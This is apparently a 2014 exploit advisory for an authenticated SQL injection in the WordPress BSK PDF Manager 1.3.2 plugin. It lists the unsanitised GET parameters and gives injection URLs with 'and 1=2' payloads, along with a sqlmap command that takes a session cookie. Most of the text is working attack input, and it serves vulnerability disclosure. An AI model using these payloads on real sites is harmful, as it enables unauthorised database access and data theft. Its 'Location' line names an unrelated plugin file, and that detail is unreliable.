###################### # Exploit Title : Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection # Exploit Author : Claudio Viviani # Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/ # Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip # Date : 2014-07-04 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox # Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Location : http://localhost/wp-content/plugins/compfight/compfight-search.php ###################### # Vulnerable code : [claudio@localhost ~]$ grep -R GET bsk-pdf-manager/ bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){ bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $categories_curr_view = trim($_GET['view']); bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['categoryid']) && $_GET['categoryid']){ bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $category_id = trim($_GET['categoryid']); bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){ bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $lists_curr_view = trim($_GET['view']); bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['pdfid']) && $_GET['pdfid']){ bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $pdf_id = trim($_GET['pdfid']); $category_id = trim($_GET['categoryid']); $pdf_id = trim($_GET['pdfid']); ###################### Exploit Code via Browser: http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2 http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2 Exploit Code via sqlmap: sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it #####################